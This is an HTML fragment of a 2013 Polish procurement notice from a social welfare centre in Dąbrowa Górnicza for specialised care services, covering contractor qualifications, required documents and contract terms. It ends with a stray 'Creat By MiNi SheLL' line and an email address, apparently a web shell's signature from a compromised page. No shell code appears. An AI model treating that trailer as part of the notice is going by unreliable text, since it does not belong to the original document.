terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi, posiadają co najmniej roczny staż pracy w jednostkach: 1) szpitalu psychiatrycznym, 2) jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi, 3) placówce  terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym, 4) ośrodku terapeutyczno-edukacyjno-wychowawczym, 5) zakładzie rehabilitacji, 6) innej jednostce niż wymienione w pkt 1-5, świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, i mają zapewnioną możliwość konsultacji z osobami świadczącymi specjalistyczne usługi, posiadającymi wymagane kwalifikacje oraz , że osoby które będą świadczyć usługi o których mowa w rozdz. VII.1.3. lit b SIWZ mają przeszkolenie i doświadczenie w zakresie umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań, kształtowania nawyków celowej aktywności, prowadzenia treningu zachowań społecznych dla osób świadczących usługi, o których mowa w niniejszym rozdziale jw. W przypadku przedstawienia w wykazie osób, którymi Wykonawca będzie dysponował za zgodą innych podmiotów wymagane jest przedłożenie pisemnego zobowiązania tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia na okres realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie warunku w tym zakresie nastąpi poprzez udokumentowanie posiadania opłaconej  polisy ubezpieczeniowej od odpowiedzialności cywilnej, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>VII.4.1 Wypełniony formularz oferty (załącznik Nr 1 do SIWZ- wskazana data podpisania dokumentu). VII.4.2 Pełnomocnictwo do reprezentacji Wykonawcy. Jeżeli ustanowione jest pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w formie oryginału lub kopii poświadczonej przez notariusza. Pełnomocnictwo wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza. VII.4.3 W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami  niezbędnymi do realizacji zamówienia, a w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów  na okres korzystania z nich przy wykonaniu zamówienia -zgodnie z art. 26 ust 2b  Ustawy Pzp, które musi zawierać co najmniej: a) dane pozwalające na identyfikację stron, b) zakres udostępniania zasobów innego podmiotu c)	sposobu wykorzystania  zasobów  innego pomiotu, przez Wykonawcę, przy wykonaniu zamówienia d) charakteru stosunku, jaki będzie łączył wykonawcę, przy wykonaniu zamówienia, e) zakresu i okresu udziału innego pomiotu przy wykonaniu zamówienia. Postanowienia dotyczące podmiotów, które mają siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku: a. Zmiany terminu wykonania zamówienia na skutek  wystąpienia siły wyższej, czyli wydarzenia nieprzewidywalnego w chwili podpisywania umowy lub inne okoliczności niezależne od Zamawiającego, w tym takich, których Zamawiający  przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć np. nietypowe dla klimatu polskiego zjawiska bądź zdarzenia atmosferyczne lub inne. b. Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi  bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec (zwiększeniu lub zmniejszeniu) ilości godzin świadczonych usług opiekuńczych wynikających z oferty i SIWZ w ramach maksymalnej wartości zamówienia. c. Zmiany ilości godzin usług w ramach posiadanych środków finansowych wynikłe na podstawie obiektywnych przesłanek nie dających się przewidzieć w chwili zawarcia umowy  ze względu na zmienne ilości osób kierowanych przez lekarzy, a wymagających ze względu na stan zdrowia i sytuacji osobistej pomocy w formie specjalistycznych usług opiekuńczych i i specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi, do świadczenia których ośrodki pomocy są zobligowane na podstawie obowiązującej Ustawy o pomocy społecznej. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. Wszelkie zmiany i uzupełnienia  treści umowy mogą być dokonane wyłącznie w formie pisemnej  pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej,
ul. Skibińskiego 1,
41-300 Dąbrowa Górnicza,
IIIp., pok. 54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej,
ul. Skibińskiego 1,
41-300 Dąbrowa Górnicza,
IIIp., pok. 54.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> VIII.1 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów na zasobach których, na zasadach określonych w art. 26 ust 2b ustawy Pzp polega Wykonawca, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez wykonawcę lub te podmioty. VIII.2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni spełniać warunki udziału w postępowaniu określone w rozdz. VI SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnienie tych warunków, zgodnie z zapisami zawartymi w rozdz. VII SIWZ. 
VIII.3 W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców do oferty muszą być załączone dokumenty i oświadczenia zawarte w rozdz. VII.2.2 SIWZ przez każdego z Wykonawców lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w rozdz. VII. 3.1 SIWZ każdy z Wykonawców składa oddzielnie. Oświadczenie wymienione w rozdz. VII.1.1 SIWZ winno być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie na jednym druku przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W odniesieniu do dokumentów i oświadczeń wskazanych w rozdz. VII.1.2 i VII.1.3, VII.1.4, SIWZ - jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument ten składa przynajmniej jeden z nich. Formularz ofertowy wymieniony w rozdz. VII.4.1 (Załącznik Nr 1 do SIWZ) winien być podpisany przez uprawnionych przedstawicieli Wykonawców. VIII.4 Ponadto ww. Wykonawcy ustanowią pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i przy zawarciu umowy (dotyczy również Spółki Cywilnej). Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.
VIII.5 W przypadku wyboru najkorzystniejszej oferty złożonej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowy konsorcjum (Wykonawców występujących wspólnie), która będzie regulować wzajemną współpracę Wykonawców, czyli zawiera postanowienia dotyczące m. in. realizacji poszczególnych części zamówienia, sposobu dokonywania rozliczeń. Zgodnie z treścią art. 141 ustawy Pzp Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej odpowiedzialności zostały uregulowane w art. 366 § 1 Kodeksu Cywilnego. VIII.6 W przypadku, gdy z załączonych do oferty dokumentów nie wynika sposób reprezentacji Wykonawcy, przed podpisaniem umowy Zamawiający wymaga przedłożenia dokumentu (pełnomocnictwa) z którego wynika uprawnienie osoby lub osób do składania oświadczeń woli i reprezentowania Wykonawcy.TERMIN WYKONANIA ZAMÓWIENIA-12 miesięcy tj. 1. Umowa zostaje zawarta na okres: od 01.01.2014r. do 31.12.2014r. 2. W przypadku wyczerpania środków zabezpieczonych na ten cel, tj. maksymalnej wartości zamówienia, umowa rozwiązuje się z dniem wyczerpania środków.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com